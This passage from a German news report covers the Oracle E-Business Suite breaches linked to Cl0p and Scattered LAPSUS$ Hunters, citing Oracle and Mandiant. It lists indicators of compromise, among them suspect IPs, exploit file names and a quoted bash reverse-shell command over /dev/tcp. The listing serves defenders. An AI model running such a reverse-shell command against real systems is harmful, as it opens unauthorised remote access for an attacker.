Laut Rob Duhart, Chief Security Officer von Oracle, sollten Unternehmen auf Indikatoren für eine Kompromittierung (IoCs) achten. Die folgenden IP-Adressen und Artefakte deuteten dabei auf eine mögliche Beteiligung der Scattered LAPSUS$ Hunters-Gruppe an dem Exploit hin:
- 200.107.207[.]26 (Potenzielle GET- und POST-Aktivität)
- 185.181.60[.]11 (Potenzielle GET- und POST-Aktivität)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Herstellen einer ausgehenden TCP-Verbindung über eine bestimmte port)
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
Kompromittierung per Mail
Der Sicherheitsanbieter Mandiant beschreibt die Breaches als eine „massive E-Mail-Kampagne“, die von Hunderten kompromittierten Konten aus gestartet wurde. „Cl0p nutzte mehrere Schwachstellen in Oracle EBS aus und konnte so im August 2025 große Datenmengen von mehreren Opfern stehlen“, erklärte Charles Carmakal, CTO von Mandiant, in einem LinkedIn-Post.
Er fügte hinzu, dass mehrere Schwachstellen ausgenutzt wurden, darunter „Schwachstellen, die im Oracle-Update vom Juli 2025 gepatcht wurden, sowie eine, die an diesem Wochenende gepatcht wurde (CVE-2025-61882).“
